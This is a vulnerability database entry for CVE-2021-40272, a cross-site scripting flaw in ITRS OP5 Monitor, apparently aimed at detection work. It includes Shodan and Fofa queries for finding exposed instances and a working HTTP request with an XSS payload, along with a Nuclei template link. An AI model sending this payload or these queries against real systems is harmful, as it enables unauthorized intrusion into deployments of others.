🔙 목록으로 돌아가기

CVE-2021-40272: IRTS OP5 Monitor - Cross-Site Scripting

TitleIRTS OP5 Monitor - Cross-Site Scripting
Authorritikchaddha
SeverityMedium
ImpactSuccessful exploitation could lead to unauthorized access or data theft.
RemediationUpdate to the latest version of OP5 Monitor to mitigate the XSS vulnerability.
EPSS Score0.04872
CVE IDCVE-2021-40272
CWE IDCWE-79
Shodan Querytitle:"ITRS"
Fofa Querytitle="ITRS"
Tags cve2021 cve irts op5 xss vuln

🔍 Vulnerability Description

OP5 Monitor 8.3.1, 8.3.2, and OP5 8.3.3 are vulnerable to Cross Site Scripting (XSS).

🌐 HTTP Request

GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:140.) Gecko/20100101 Firefox/140.
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-40272.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-40272.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A